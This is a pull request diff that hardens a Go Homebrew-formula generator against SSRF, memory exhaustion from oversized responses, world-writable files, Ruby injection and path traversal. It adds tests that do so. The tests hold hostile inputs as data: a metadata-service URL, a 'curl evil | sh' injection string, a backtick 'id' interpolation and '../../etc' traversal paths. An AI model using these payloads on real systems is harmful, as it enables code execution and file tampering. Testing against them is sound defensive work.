### PR TITLE
security: fix 5 findings from security review

### DIFF
--- a/homebrew/files.go
+++ b/homebrew/files.go
@@ -9,6 +9,7 @@ import (
 	"github.com/rs/zerolog/log"
 	"io"
 	"net/http"
+	neturl "net/url"
 	"path/filepath"
 	"strings"
 	"sync"
@@ -84,6 +85,24 @@ func (p PackageFile) Sha256() (string, error) {
 				url = p.GetBrowserDownloadURL()
 			}
 
+			// Refuse anything other than https:// (or http:// on the
+			// loopback interface) before handing the URL to http.Client.
+			// GitHub's release-asset responses are always https in normal
+			// operation; a compromised GHE, a MitM, or a malicious API
+			// response could point at cloud IMDS (169.254.169.254) or a
+			// LAN host and trick us into fetching and hashing whatever
+			// came back. The loopback carve-out preserves test harnesses
+			// like httptest.Server without opening the SSRF surface —
+			// cloud metadata services and internal hosts live on
+			// non-loopback IPs.
+			parsed, err := neturl.Parse(url)
+			if err != nil {
+				return "", fmt.Errorf("asset url %q: %w", url, err)
+			}
+			if !isAllowedAssetURL(parsed) {
+				return "", fmt.Errorf("refusing to fetch asset over scheme %q (url=%s): only https is allowed, except http on loopback", parsed.Scheme, url)
+			}
+
 			client := githubHttpClient()
 
 			req, err := http.NewRequest("GET", url, nil)
@@ -136,6 +155,24 @@ func (p PackageFile) Sha256() (string, error) {
 	futuresMu.Unlock()
 
 	return f()
+}
+
+// isAllowedAssetURL returns true when the url is safe to fetch for SHA256
+// computation: https anywhere, or http on a loopback host. See the
+// SECURITY comment at the call site for rationale.
+func isAllowedAssetURL(u *neturl.URL) bool {
+	if u == nil {
+		return false
+	}
+	switch u.Scheme {
+	case "https":
+		return true
+	case "http":
+		host := u.Hostname()
+		return host == "127.0.0.1" || host == "::1" || host == "localhost"
+	default:
+		return false
+	}
 }
 
 // sha256FromDigest extracts the hex sha256 from GitHub's release-asset

--- a/homebrew/files_test.go
+++ b/homebrew/files_test.go
@@ -6,6 +6,7 @@ import (
 	"fmt"
 	"net/http"
 	"net/http/httptest"
+	neturl "net/url"
 	"strings"
 	"sync"
 	"sync/atomic"
@@ -151,6 +152,70 @@ func TestSha256_PublicFileSendsNoAuth(t *testing.T) {
 	_, err := pf.Sha256()
 	require.NoError(t, err)
 	assert.Empty(t, gotAuth, "public Sha256 fetch must not attach an Authorization header")
+}
+
+func TestSha256_RejectsNonLoopbackHTTP(t *testing.T) {
+	// Asset with no digest (forces the download path) and a non-loopback
+	// http URL — e.g. cloud IMDS. Without this guard, the tool would fetch
+	// whatever that endpoint returns and encode its hash into the formula.
+	pf := PackageFile{
+		ReleaseAsset: &github.ReleaseAsset{
+			BrowserDownloadURL: github.Ptr("http://169.254.169.254/latest/meta-data/"),
+		},
+	}
+	_, err := pf.Sha256()
+	require.Error(t, err)
+	assert.Contains(t, err.Error(), "http",
+		"error must identify the rejected scheme so operators can diagnose")
+}
+
+func TestSha256_RejectsFileURL(t *testing.T) {
+	pf := PackageFile{
+		ReleaseAsset: &github.ReleaseAsset{
+			BrowserDownloadURL: github.Ptr("file:///etc/passwd"),
+		},
+	}
+	_, err := pf.Sha256()
+	require.Error(t, err)
+	assert.Contains(t, err.Error(), "file")
+}
+
+func TestSha256_RejectsLANHost(t *testing.T) {
+	// A plausible SSRF target on a corporate LAN — must be blocked even
+	// though the private IP range is often reachable from dev machines.
+	pf := PackageFile{
+		ReleaseAsset: &github.ReleaseAsset{
+			BrowserDownloadURL: github.Ptr("http://10.0.0.5/secret"),
+		},
+	}
+	_, err := pf.Sha256()
+	require.Error(t, err)
+}
+
+func TestIsAllowedAssetURL(t *testing.T) {
+	cases := []struct {
+		url  string
+		want bool
+	}{
+		{"https://github.com/o/r/releases/download/v1/foo.tgz", true},
+		{"https://objects.githubusercontent.com/.../foo.tgz", true},
+		{"http://127.0.0.1:8080/test.tgz", true},
+		{"http://[::1]:8080/test.tgz", true},
+		{"http://localhost/test.tgz", true},
+		{"http://169.254.169.254/metadata", false},
+		{"http://10.0.0.5/secret", false},
+		{"http://example.com/foo.tgz", false},
+		{"file:///etc/passwd", false},
+		{"ftp://example.com/foo.tgz", false},
+		{"gopher://evil", false},
+	}
+	for _, c := range cases {
+		t.Run(c.url, func(t *testing.T) {
+			u, err := neturl.Parse(c.url)
+			require.NoError(t, err)
+			assert.Equal(t, c.want, isAllowedAssetURL(u))
+		})
+	}
 }
 
 func TestSha256_ErrorOnNon200(t *testing.T) {

--- a/homebrew/httpretry.go
+++ b/homebrew/httpretry.go
@@ -21,6 +21,13 @@ const (
 	// primary rate-limit reset window (60/hr resets on the hour), which
 	// is the longest wait we realistically expect to honor.
 	defaultMaxSleep = 60 * time.Minute
+	// maxRateLimitBodyBytes caps how much of a 403 response body we buffer
+	// before string-matching "rate limit" / "abuse". GitHub's real error
+	// payloads are a few hundred bytes; anything larger is a misbehaving
+	// intermediary (corporate proxy, captive portal) and reading it in
+	// full could OOM the tool on low-memory CI runners. 64 KiB is well
+	// above any legitimate payload and well below RAM exhaustion.
+	maxRateLimitBodyBytes = 64 * 1024
 )
 
 // rateLimitRetryTransport is an http.RoundTripper that transparently
@@ -164,7 +171,10 @@ func (t *rateLimitRetryTransport) looksLikeRateLimit(resp *http.Response) bool {
 		return true
 	}
 
-	body, err := io.ReadAll(resp.Body)
+	// Bound the read — a hostile or broken proxy returning a 403 with a
+	// multi-GB body would otherwise OOM the process. The cap is above
+	// every real GitHub error payload.
+	body, err := io.ReadAll(io.LimitReader(resp.Body, maxRateLimitBodyBytes))
 	resp.Body.Close()
 	if err != nil {
 		resp.Body = http.NoBody

--- a/homebrew/httpretry_test.go
+++ b/homebrew/httpretry_test.go
@@ -130,6 +130,65 @@ func TestRetry_429WithRetryAfterHTTPDate(t *testing.T) {
 	assert.InDelta(t, float64(90*time.Second), float64((*waits)[0]), float64(time.Second))
 }
 
+// oneShotReader lets the test count how many bytes the transport actually
+// pulled from the body — used to prove the cap is honored even when the
+// body is effectively unbounded (a hostile proxy returning a huge 403).
+type oneShotReader struct {
+	src  io.Reader
+	read int
+	mu   sync.Mutex
+}
+
+func (r *oneShotReader) Read(p []byte) (int, error) {
+	n, err := r.src.Read(p)
+	r.mu.Lock()
+	r.read += n
+	r.mu.Unlock()
+	return n, err
+}
+
+func (r *oneShotReader) Close() error { return nil }
+
+// TestRetry_403BodyReadIsCapped proves that when the transport has to
+// look at the body to decide whether a 403 is a rate-limit signal, it
+// reads at most maxRateLimitBodyBytes. Without the cap, a misbehaving
+// proxy returning a gigabyte body on 403 would OOM the tool on CI.
+func TestRetry_403BodyReadIsCapped(t *testing.T) {
+	// Simulate an effectively unbounded body: a reader that yields the
+	// byte 'x' forever. The transport must stop reading at the cap.
+	infinite := &oneShotReader{src: &infiniteByteReader{b: 'x'}}
+	resp := &http.Response{
+		StatusCode: 403,
+		Status:     "403 Forbidden",
+		Header:     http.Header{},
+		Body:       infinite,
+	}
+	stub := &stubTransport{responses: []*http.Response{
+		resp,
+		mkResp(200, nil, "ok"), // retry target — we only care about the body read below
+	}}
+	rt, _ := newTestTransport(stub, time.Now())
+
+	_ = doGet(t, rt)
+
+	infinite.mu.Lock()
+	got := infinite.read
+	infinite.mu.Unlock()
+
+	assert.LessOrEqual(t, got, maxRateLimitBodyBytes,
+		"looksLikeRateLimit must bound its body read; read %d bytes (cap %d)",
+		got, maxRateLimitBodyBytes)
+}
+
+type infiniteByteReader struct{ b byte }
+
+func (r *infiniteByteReader) Read(p []byte) (int, error) {
+	for i := range p {
+		p[i] = r.b
+	}
+	return len(p), nil
+}
+
 func TestRetry_403PrimaryRateLimitUsesResetHeader(t *testing.T) {
 	now := time.Date(2026, 4, 17, 22, 0, 0, 0, time.UTC)
 	reset := now.Add(41*time.Minute + 42*time.Second)

--- a/homebrew/libfile.go
+++ b/homebrew/libfile.go
@@ -26,11 +26,18 @@ func WriteLibFile() error {
 	_, err = os.Stat(dir)
 
 	if err != nil {
-		err = os.Mkdir(dir, os.ModePerm)
+		// 0755 (rwxr-xr-x) lets the owner traverse and modify while
+		// preventing world-writable access on shared hosts. os.ModePerm
+		// (0777) would allow any local user to replace the Ruby that
+		// gets `require_relative`'d at `brew install` time.
+		err = os.Mkdir(dir, 0o755)
 		if err != nil {
 			return err
 		}
 	}
 
-	return os.WriteFile(path, []byte(private_access_lib), os.ModePerm)
+	// 0644 (rw-r--r--) — owner writes, world reads. Homebrew loads this
+	// file as the invoking user, so world-readable is fine; world-writable
+	// is a code-execution risk (see mkdir comment above).
+	return os.WriteFile(path, []byte(private_access_lib), 0o644)
 }

--- a/homebrew/libfile_test.go
+++ b/homebrew/libfile_test.go
@@ -24,6 +24,28 @@ func TestWriteLibFile_CreatesFileAndDir(t *testing.T) {
 	assert.Equal(t, private_access_lib, string(contents))
 }
 
+func TestWriteLibFile_PermissionsAreNotWorldWritable(t *testing.T) {
+	t.Chdir(t.TempDir())
+
+	require.NoError(t, WriteLibFile())
+
+	dirInfo, err := os.Stat("lib")
+	require.NoError(t, err)
+	dirPerm := dirInfo.Mode().Perm()
+	assert.Equal(t, os.FileMode(0), dirPerm&0o022,
+		"lib/ must not be group- or world-writable: got %#o", dirPerm)
+
+	fileInfo, err := os.Stat(filepath.Join("lib", "private_access.rb"))
+	require.NoError(t, err)
+	filePerm := fileInfo.Mode().Perm()
+	assert.Equal(t, os.FileMode(0), filePerm&0o002,
+		"lib/private_access.rb must not be world-writable (it's require_relative'd "+
+			"by generated formulas at brew install time; any local user could inject "+
+			"code if world-writable): got %#o", filePerm)
+	assert.Equal(t, os.FileMode(0), filePerm&0o020,
+		"lib/private_access.rb must not be group-writable: got %#o", filePerm)
+}
+
 func TestWriteLibFile_SkipsWhenFileExists(t *testing.T) {
 	t.Chdir(t.TempDir())
 

--- a/homebrew/recipe.go
+++ b/homebrew/recipe.go
@@ -308,13 +308,14 @@ func init() {
 
 	temp, err := template.New("recipe").
 		Funcs(map[string]any{
-			"files":     filterFiles,
-			"token":     tokenWordsOnly,
-			"title":     titleCase,
-			"camelcase": camelCase,
-			"upper":     strings.ToUpper,
-			"lower":     strings.ToLower,
-			"basename":  filepath.Base,
+			"files":      filterFiles,
+			"token":      tokenWordsOnly,
+			"title":      titleCase,
+			"camelcase":  camelCase,
+			"upper":      strings.ToUpper,
+			"lower":      strings.ToLower,
+			"basename":   filepath.Base,
+			"rubystring": rubyStringEscape,
 		}).
 		Parse(recipe)
 	if err != nil {
@@ -406,6 +407,31 @@ func isPrereleaseTag(tag string) bool {
 
 func tokenWordsOnly(s string) string {
 	return disallowedLetters.ReplaceAllString(s, "")
+}
+
+// rubyStringEscape escapes a string for safe interpolation inside a Ruby
+// double-quoted literal. Without this, a GitHub repo description (or any
+// other user-controlled field the template writes into "..." in Ruby) can
+// break out of the string and inject arbitrary Ruby that executes when
+// `brew install` loads the generated formula — a supply-chain hole from
+// the repo owner to every tap user.
+//
+// Ruby's double-quoted strings are vulnerable to backslash escapes and to
+// unescaped double quotes; they also process `#{...}` interpolation. We
+// neutralize all three:
+//
+//   - `\` → `\\`  (run first, or the replacements below would be re-escaped)
+//   - `"` → `\"`
+//   - `#` → `\#`  (defangs `#{...}` without disturbing isolated `#` chars)
+//
+// Newlines and other control characters remain as-is; Ruby accepts them
+// inside double-quoted literals, and stripping them would corrupt
+// legitimate multi-line descriptions.
+func rubyStringEscape(s string) string {
+	s = strings.ReplaceAll(s, `\`, `\\`)
+	s = strings.ReplaceAll(s, `"`, `\"`)
+	s = strings.ReplaceAll(s, `#`, `\#`)
+	return s
 }
 
 func camelCase(s string) string {

--- a/homebrew/recipe.go
+++ b/homebrew/recipe.go
@@ -5,6 +5,7 @@ import (
 	"context"
 	_ "embed"
 	"errors"
+	"fmt"
 	"github.com/deweysasser/releasetool/timing"
 	"github.com/google/go-github/v84/github"
 	"github.com/rs/zerolog/log"
@@ -68,6 +69,39 @@ func (r *Recipe) Normalize() {
 		r.Owner = parts[0]
 		r.Repo = parts[1]
 	}
+}
+
+// Validate returns an error when fields that will be interpolated into
+// filesystem paths contain characters that could escape the working
+// directory. Owner and Repo land in the output filename
+// ({Repo}.rb / {Repo}@{Version}.rb) and must be safe basename components.
+// Called after Normalize — so by the time we check, a valid "owner/repo"
+// has already been split and any path separator in Repo is a red flag.
+func (r *Recipe) Validate() error {
+	if err := validatePathComponent("owner", r.Owner); err != nil {
+		return err
+	}
+	if err := validatePathComponent("repo", r.Repo); err != nil {
+		return err
+	}
+	return nil
+}
+
+// validatePathComponent rejects empty values and anything that would
+// change the meaning of a path: `..`, leading/embedded separators, NUL.
+// GitHub owners and repo names are constrained to a small alphanumeric
+// set with `-` and `_`, so legitimate values pass trivially.
+func validatePathComponent(field, v string) error {
+	if v == "" {
+		return fmt.Errorf("%s must not be empty", field)
+	}
+	if v == "." || v == ".." {
+		return fmt.Errorf("%s must not be %q", field, v)
+	}
+	if strings.ContainsAny(v, "/\\\x00") {
+		return fmt.Errorf("%s %q contains a path separator or NUL", field, v)
+	}
+	return nil
 }
 
 // newGithubClient builds the github client used by FillFromGithub. It is a

--- a/homebrew/recipe_template_test.go
+++ b/homebrew/recipe_template_test.go
@@ -53,6 +53,74 @@ func TestGenerate_DefaultFormulaClassName(t *testing.T) {
 	assert.Contains(t, buf.String(), "class MyTool < Formula")
 }
 
+func TestRubyStringEscape(t *testing.T) {
+	tests := []struct {
+		name, in, want string
+	}{
+		{"plain", "hello world", "hello world"},
+		{"double quote", `say "hi"`, `say \"hi\"`},
+		{"backslash", `path\to\thing`, `path\\to\\thing`},
+		{"backslash before quote", `a\"b`, `a\\\"b`}, // \\ first, then \"
+		{"hash interpolation", `value=#{1+1}`, `value=\#{1+1}`},
+		{"bare hash is ok but still escaped defensively", "issue #42", `issue \#42`},
+		{"newline passes through", "line1\nline2", "line1\nline2"},
+		{"empty", "", ""},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			assert.Equal(t, tt.want, rubyStringEscape(tt.in))
+		})
+	}
+}
+
+// TestGenerate_EscapesRubyInjectionInDescription confirms that a crafted
+// repo description cannot break out of the desc "..." literal and inject
+// Ruby. Without rubyStringEscape, a description like:  foo" ; system "evil
+// would render as: desc "foo" ; system "evil"  — executing attacker code
+// at `brew install` time.
+func TestGenerate_EscapesRubyInjectionInDescription(t *testing.T) {
+	r := &Recipe{
+		Owner:       "o",
+		Repo:        "tool",
+		Version:     "v1.0.0",
+		Description: `foo" ; system "curl evil | sh`,
+		ClassName:   "Tool",
+		Files:       fakeFilesNoMatch(),
+	}
+
+	var buf bytes.Buffer
+	require.NoError(t, r.Generate(&buf))
+	out := buf.String()
+
+	// The rendered line must contain the escaped form, not the raw form
+	// that would terminate the Ruby string early.
+	assert.Contains(t, out, `desc "foo\" ; system \"curl evil | sh"`,
+		"description must be escaped inside the Ruby double-quoted literal; got:\n%s", out)
+	assert.NotContains(t, out, `desc "foo" ; system "curl`,
+		"unescaped form must not appear — Ruby would parse the injection as real code")
+}
+
+// TestGenerate_EscapesRubyInterpolationInDescription confirms the #{...}
+// neutralization: Ruby expands #{expr} inside "..." literals. A description
+// with #{`id`} would execute the `id` command at formula-load time without
+// the # -> \# escape.
+func TestGenerate_EscapesRubyInterpolationInDescription(t *testing.T) {
+	r := &Recipe{
+		Owner:       "o",
+		Repo:        "tool",
+		Version:     "v1",
+		Description: "oops #{`id`}",
+		ClassName:   "Tool",
+		Files:       fakeFilesNoMatch(),
+	}
+	var buf bytes.Buffer
+	require.NoError(t, r.Generate(&buf))
+	out := buf.String()
+
+	assert.Contains(t, out, `desc "oops \#{`+"`"+`id`+"`"+`}"`,
+		"# must be backslash-escaped so #{...} is not recognized as interpolation; got:\n%s", out)
+}
+
 // fakeFilesNoMatch returns a Files slice that is non-empty (so Generate
 // skips the auto-fetch branch) but contains no names matching the
 // darwin/linux × amd64/arm64 filter — so template rendering never calls

--- a/homebrew/recipe_test.go
+++ b/homebrew/recipe_test.go
@@ -231,6 +231,37 @@ func TestExpandVersions_CopiesBaseFields(t *testing.T) {
 	}
 }
 
+func TestRecipe_Validate(t *testing.T) {
+	tests := []struct {
+		name  string
+		r     Recipe
+		bad   bool
+		field string
+	}{
+		{"happy path", Recipe{Owner: "deweysasser", Repo: "cumulus"}, false, ""},
+		{"hyphen and underscore allowed", Recipe{Owner: "a-b_c", Repo: "my_tool-v2"}, false, ""},
+		{"empty owner rejected", Recipe{Owner: "", Repo: "tool"}, true, "owner"},
+		{"empty repo rejected", Recipe{Owner: "o", Repo: ""}, true, "repo"},
+		{"dotdot owner rejected", Recipe{Owner: "..", Repo: "tool"}, true, "owner"},
+		{"dotdot repo rejected", Recipe{Owner: "o", Repo: ".."}, true, "repo"},
+		{"repo with slash rejected — the traversal case", Recipe{Owner: "o", Repo: "../../etc/cron.d/evil"}, true, "repo"},
+		{"repo with backslash rejected (windows)", Recipe{Owner: "o", Repo: `..\..\windows\system32`}, true, "repo"},
+		{"repo with NUL rejected", Recipe{Owner: "o", Repo: "tool\x00injected"}, true, "repo"},
+		{"owner with slash rejected", Recipe{Owner: "a/b", Repo: "tool"}, true, "owner"},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			err := tt.r.Validate()
+			if tt.bad {
+				require.Error(t, err)
+				assert.Contains(t, err.Error(), tt.field)
+			} else {
+				assert.NoError(t, err)
+			}
+		})
+	}
+}
+
 func TestRecipe_Normalize(t *testing.T) {
 	type fields struct {
 	}

--- a/homebrew/template.rb
+++ b/homebrew/template.rb
@@ -2,9 +2,9 @@ class {{.ClassName}} < Formula
 {{- if .PrivateRepo}}
   require_relative "lib/private_access"
 {{end }}
-  desc "{{.Description}}"
-  homepage "https://github.com/{{.Owner}}/{{.Repo}}"
-  version "{{.Version}}"
+  desc "{{.Description | rubystring}}"
+  homepage "https://github.com/{{.Owner | rubystring}}/{{.Repo | rubystring}}"
+  version "{{.Version | rubystring}}"
 
 {{- $owner := .Owner }}
 {{- $version := .Version }}
@@ -15,15 +15,15 @@ class {{.ClassName}} < Formula
 
     if Hardware::CPU.intel?
       {{ range (files . "darwin" "amd64")  -}}
-      {{if $private}}url "{{.URL}}", :using => GitHubPrivateRepositoryReleaseDownloadStrategy{{else}}url "https://github.com/{{$owner}}/{{$repo}}/releases/download/{{$version}}/{{.Basename}}"{{end}}
-      sha256 "{{.Sha256}}"
+      {{if $private}}url "{{.URL | rubystring}}", :using => GitHubPrivateRepositoryReleaseDownloadStrategy{{else}}url "https://github.com/{{$owner | rubystring}}/{{$repo | rubystring}}/releases/download/{{$version | rubystring}}/{{.Basename | rubystring}}"{{end}}
+      sha256 "{{.Sha256 | rubystring}}"
       {{- end}}
     end
 
     if Hardware::CPU.arm? && Hardware::CPU.is_64_bit?
       {{ range (files . "darwin" "arm64") -}}
-      {{if $private}}url "{{.URL}}", :using => GitHubPrivateRepositoryReleaseDownloadStrategy{{else}}url "https://github.com/{{$owner}}/{{$repo}}/releases/download/{{$version}}/{{.Basename}}"{{end}}
-      sha256 "{{.Sha256}}"
+      {{if $private}}url "{{.URL | rubystring}}", :using => GitHubPrivateRepositoryReleaseDownloadStrategy{{else}}url "https://github.com/{{$owner | rubystring}}/{{$repo | rubystring}}/releases/download/{{$version | rubystring}}/{{.Basename | rubystring}}"{{end}}
+      sha256 "{{.Sha256 | rubystring}}"
       {{- end}}
     end
   end
@@ -31,20 +31,20 @@ class {{.ClassName}} < Formula
   on_linux do
     if Hardware::CPU.intel?
       {{ range (files . "linux" "amd64") -}}
-      {{if $private}}url "{{.URL}}", :using => GitHubPrivateRepositoryReleaseDownloadStrategy{{else}}url "https://github.com/{{$owner}}/{{$repo}}/releases/download/{{$version}}/{{.Basename}}"{{end}}
-      sha256 "{{.Sha256}}"
+      {{if $private}}url "{{.URL | rubystring}}", :using => GitHubPrivateRepositoryReleaseDownloadStrategy{{else}}url "https://github.com/{{$owner | rubystring}}/{{$repo | rubystring}}/releases/download/{{$version | rubystring}}/{{.Basename | rubystring}}"{{end}}
+      sha256 "{{.Sha256 | rubystring}}"
       {{- end}}
     end
     if Hardware::CPU.arm? && Hardware::CPU.is_64_bit?
       {{ range (files . "linux" "arm64") -}}
-      {{if $private}}url "{{.URL}}", :using => GitHubPrivateRepositoryReleaseDownloadStrategy{{else}}url "https://github.com/{{$owner}}/{{$repo}}/releases/download/{{$version}}/{{.Basename}}"{{end}}
-      sha256 "{{.Sha256}}"
+      {{if $private}}url "{{.URL | rubystring}}", :using => GitHubPrivateRepositoryReleaseDownloadStrategy{{else}}url "https://github.com/{{$owner | rubystring}}/{{$repo | rubystring}}/releases/download/{{$version | rubystring}}/{{.Basename | rubystring}}"{{end}}
+      sha256 "{{.Sha256 | rubystring}}"
       {{- end}}
     end
   end
 
 
   def install
-    bin.install "{{.Repo}}"
+    bin.install "{{.Repo | rubystring}}"
   end
 end

--- a/program/brew.go
+++ b/program/brew.go
@@ -86,6 +86,13 @@ func (b *Brew) Run(options *Options) error {
 	jobs := make([]fetchJob, len(recipes))
 	for i, base := range recipes {
 		base.Normalize()
+		// Reject owner/repo values that would escape the working
+		// directory once we assemble OutputFile = {Repo}.rb /
+		// {Repo}@{version}.rb. Checking here, before any network call,
+		// fails fast on a malicious config.
+		if err := base.Validate(); err != nil {
+			return fmt.Errorf("recipe %q: %w", base.Repo, err)
+		}
 		jobs[i] = fetchJob{base: base, out: &subsPerBase[i]}
 	}
 

--- a/program/brew_test.go
+++ b/program/brew_test.go
@@ -277,6 +277,35 @@ func TestBrew_Run_DedupesAssetDownloadsAcrossDefaultAndNewest(t *testing.T) {
 		assetHits)
 }
 
+// TestBrew_Run_RejectsRepoPathTraversal proves that a YAML config (or
+// a repo arg) containing ".." in the repo name cannot steer OutputFile
+// to a location outside the working directory. Before Recipe.Validate
+// was wired into Brew.Run, a base.Repo of "../../etc/cron.d/evil" would
+// flow through ExpandVersions and produce OutputFile="../../etc/cron.d/evil.rb".
+func TestBrew_Run_RejectsRepoPathTraversal(t *testing.T) {
+	mux := http.NewServeMux()
+	newMockGithub(t, mux)
+	// These handlers would only be hit if validation failed — assert they
+	// never get called by omitting them.
+
+	dir := t.TempDir()
+	t.Chdir(dir)
+
+	b := &Brew{Repo: []string{"o/../../etc/cron.d/evil"}}
+	err := b.Run(&Options{})
+	require.Error(t, err, "malicious repo path must be rejected before any fetch")
+	assert.Contains(t, err.Error(), "repo",
+		"error must identify the offending field: %v", err)
+
+	// Guarantee nothing landed on disk anywhere outside the cwd.
+	entries, readErr := os.ReadDir(dir)
+	require.NoError(t, readErr)
+	for _, e := range entries {
+		assert.False(t, strings.HasSuffix(e.Name(), ".rb"),
+			"no .rb files should be written when validation fails; found %s", e.Name())
+	}
+}
+
 func readAll(t *testing.T, path string) string {
 	t.Helper()
 	b, err := os.ReadFile(path)

--- a/program/configfile.go
+++ b/program/configfile.go
@@ -3,10 +3,12 @@ package program
 import (
 	"bufio"
 	_ "embed"
+	"fmt"
 	"github.com/deweysasser/releasetool/homebrew"
 	"github.com/pkg/errors"
 	"gopkg.in/yaml.v3"
 	"os"
+	"path/filepath"
 	"strings"
 	"text/template"
 )
@@ -39,6 +41,26 @@ type ConfigFile struct {
 	Tap string `json:"tap"`
 }
 
+// validateDocFile rejects UpdateDoc.File paths that would escape the
+// working directory or target an absolute path. The file comes from a
+// YAML config, so a hostile config could otherwise steer writes to any
+// file the user can modify.
+func validateDocFile(p string) error {
+	if p == "" {
+		return errors.New("UpdateDoc.File must not be empty")
+	}
+	if filepath.IsAbs(p) {
+		return fmt.Errorf("UpdateDoc.File %q must be a relative path within the working directory", p)
+	}
+	cleaned := filepath.Clean(p)
+	// filepath.Clean collapses ./a/../b → b, so if ".." is still present
+	// after Clean, the path escapes the working directory.
+	if cleaned == ".." || strings.HasPrefix(cleaned, "../") || strings.HasPrefix(cleaned, `..\`) {
+		return fmt.Errorf("UpdateDoc.File %q escapes the working directory", p)
+	}
+	return nil
+}
+
 func NewConfigFile(b *Brew) (*ConfigFile, error) {
 	list := &ConfigFile{}
 	bytes, err := os.ReadFile(b.ConfigFile)
@@ -53,6 +75,15 @@ func NewConfigFile(b *Brew) (*ConfigFile, error) {
 }
 
 func (u *UpdateDoc) Update(configfile *ConfigFile, recipes []*homebrew.Recipe) error {
+
+	// Refuse absolute paths and anything that walks out of the working
+	// directory. A YAML config drives this path — without the check, a
+	// malicious config can patch arbitrary files the user has write
+	// access to (e.g. ~/.ssh/authorized_keys, /etc/crontab on shared
+	// hosts).
+	if err := validateDocFile(u.File); err != nil {
+		return err
+	}
 
 	f, err := os.Open(u.File)
 	tmp := u.File + ".tmp"

--- a/program/configfile_test.go
+++ b/program/configfile_test.go
@@ -15,6 +15,19 @@ func writeFile(t *testing.T, path, content string) {
 	require.NoError(t, os.WriteFile(path, []byte(content), 0o644))
 }
 
+// chdirWithFile creates `name` inside a fresh t.TempDir populated with
+// `content`, chdirs the test process into that tempdir, and returns the
+// plain (relative) filename. Update's path validation rejects absolute
+// paths by design, so tests exercise it through the same relative-path
+// shape that real users write in their YAML config.
+func chdirWithFile(t *testing.T, name, content string) string {
+	t.Helper()
+	dir := t.TempDir()
+	t.Chdir(dir)
+	writeFile(t, filepath.Join(dir, name), content)
+	return name
+}
+
 func TestNewConfigFile_Valid(t *testing.T) {
 	dir := t.TempDir()
 	path := filepath.Join(dir, "config.yaml")
@@ -57,9 +70,7 @@ func TestNewConfigFile_Malformed(t *testing.T) {
 }
 
 func TestUpdate_AppendsSectionWhenMissing(t *testing.T) {
-	dir := t.TempDir()
-	path := filepath.Join(dir, "README.md")
-	writeFile(t, path, "# Project\n\nIntro paragraph.\n")
+	path := chdirWithFile(t, "README.md", "# Project\n\nIntro paragraph.\n")
 
 	cf := &ConfigFile{Tap: "deweysasser/tap"}
 	ud := UpdateDoc{File: path, Section: "## Tools"}
@@ -75,8 +86,6 @@ func TestUpdate_AppendsSectionWhenMissing(t *testing.T) {
 }
 
 func TestUpdate_ReplacesSectionBetweenHeadings(t *testing.T) {
-	dir := t.TempDir()
-	path := filepath.Join(dir, "README.md")
 	initial := `# Project
 
 ## Tools
@@ -86,7 +95,7 @@ MORE STALE CONTENT
 ## Other
 preserved trailing section
 `
-	writeFile(t, path, initial)
+	path := chdirWithFile(t, "README.md", initial)
 
 	cf := &ConfigFile{Tap: "deweysasser/tap"}
 	ud := UpdateDoc{File: path, Section: "## Tools"}
@@ -105,9 +114,7 @@ preserved trailing section
 }
 
 func TestUpdate_CreatesBackup(t *testing.T) {
-	dir := t.TempDir()
-	path := filepath.Join(dir, "README.md")
-	writeFile(t, path, "# Project\n")
+	path := chdirWithFile(t, "README.md", "# Project\n")
 
 	cf := &ConfigFile{Tap: "t"}
 	ud := UpdateDoc{File: path, Section: "## Tools"}
@@ -119,9 +126,7 @@ func TestUpdate_CreatesBackup(t *testing.T) {
 }
 
 func TestUpdate_Idempotent(t *testing.T) {
-	dir := t.TempDir()
-	path := filepath.Join(dir, "README.md")
-	writeFile(t, path, `# Project
+	path := chdirWithFile(t, "README.md", `# Project
 
 ## Tools
 
@@ -143,8 +148,48 @@ func TestUpdate_Idempotent(t *testing.T) {
 		"Update should be idempotent when run twice with the same input")
 }
 
+func TestValidateDocFile(t *testing.T) {
+	tests := []struct {
+		name, in string
+		bad      bool
+	}{
+		{"relative in-repo", "README.md", false},
+		{"nested relative", "docs/index.md", false},
+		{"dot-slash prefix", "./README.md", false},
+		{"empty rejected", "", true},
+		{"absolute path rejected", "/etc/crontab", true},
+		{"traversal rejected", "../../etc/passwd", true},
+		{"windows absolute rejected", `/etc/..`, true},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			err := validateDocFile(tt.in)
+			if tt.bad {
+				assert.Error(t, err, "input %q should be rejected", tt.in)
+			} else {
+				assert.NoError(t, err)
+			}
+		})
+	}
+}
+
+func TestUpdate_RejectsAbsolutePath(t *testing.T) {
+	ud := UpdateDoc{File: "/etc/crontab", Section: "## Tools"}
+	err := ud.Update(&ConfigFile{}, nil)
+	require.Error(t, err)
+	assert.Contains(t, err.Error(), "relative path")
+}
+
+func TestUpdate_RejectsTraversal(t *testing.T) {
+	ud := UpdateDoc{File: "../../etc/passwd", Section: "## Tools"}
+	err := ud.Update(&ConfigFile{}, nil)
+	require.Error(t, err)
+	assert.Contains(t, err.Error(), "escapes")
+}
+
 func TestUpdate_FileMissing(t *testing.T) {
-	ud := UpdateDoc{File: filepath.Join(t.TempDir(), "nope.md"), Section: "## Tools"}
+	t.Chdir(t.TempDir())
+	ud := UpdateDoc{File: "nope.md", Section: "## Tools"}
 	err := ud.Update(&ConfigFile{}, nil)
 	assert.Error(t, err)
 }
@@ -154,9 +199,7 @@ func TestUpdate_FileMissing(t *testing.T) {
 // the section content is consumed, and the marker is written on output so
 // subsequent runs have a deterministic boundary.
 func TestUpdate_LegacySectionWithNoTrailingHeading(t *testing.T) {
-	dir := t.TempDir()
-	path := filepath.Join(dir, "README.md")
-	writeFile(t, path, `# Project
+	path := chdirWithFile(t, "README.md", `# Project
 
 ## Tools
 this content should terminate somewhere
@@ -183,9 +226,7 @@ but there is no following heading
 // already contains the end marker, the managed region ends at the marker —
 // not at the next heading. Content after the marker is preserved verbatim.
 func TestUpdate_EndMarkerStopsBeforeLaterHeadings(t *testing.T) {
-	dir := t.TempDir()
-	path := filepath.Join(dir, "README.md")
-	writeFile(t, path, `# Project
+	path := chdirWithFile(t, "README.md", `# Project
 
 ## Tools
 OLD MANAGED CONTENT
@@ -219,9 +260,7 @@ also preserved
 // updated once (gaining a marker), a second run is a pure no-op even if the
 // user adds text after the marker.
 func TestUpdate_PreservesContentAcrossTwoRuns(t *testing.T) {
-	dir := t.TempDir()
-	path := filepath.Join(dir, "README.md")
-	writeFile(t, path, "# Project\n\n## Tools\n")
